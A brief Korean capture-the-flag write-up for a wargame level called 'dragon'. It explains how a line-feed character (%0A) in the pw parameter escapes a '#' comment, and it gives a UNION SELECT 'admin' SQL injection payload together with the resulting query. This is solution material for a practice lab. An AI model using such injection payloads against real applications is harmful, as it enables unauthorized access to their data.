dragon
이번 문제는 pw 파라미터에서 SQL 인젝션을 수행해야 한다.
그런데, 쿼리문을 살펴보면 ‘guest’# 부분 때문에 그 뒤 값들은 모두 주석처리 된다.
이를 우회하기 위해서는 개행문자(LF; Line Feed, %0A)를 사용할 수 있다.
SELECT id from prob_dragon where id='guest'# and pw=''
# 위 쿼리문에서 pw 부분에 개행문자를 삽입하여 페이로드를 작성하면 주석 문자(#)를 우회하여 문제풀이가 가능하다.
# ( 페이로드 ) %0A AND id={테이블에서 조회가 되지 않는 임의의 id 값} UNION SELECT 'admin'--+
SELECT id from prob_dragon where id='guest'# and pw='
AND id='asd' UNION SELECT 'admin'
🐛.. 🐛.. 🐛..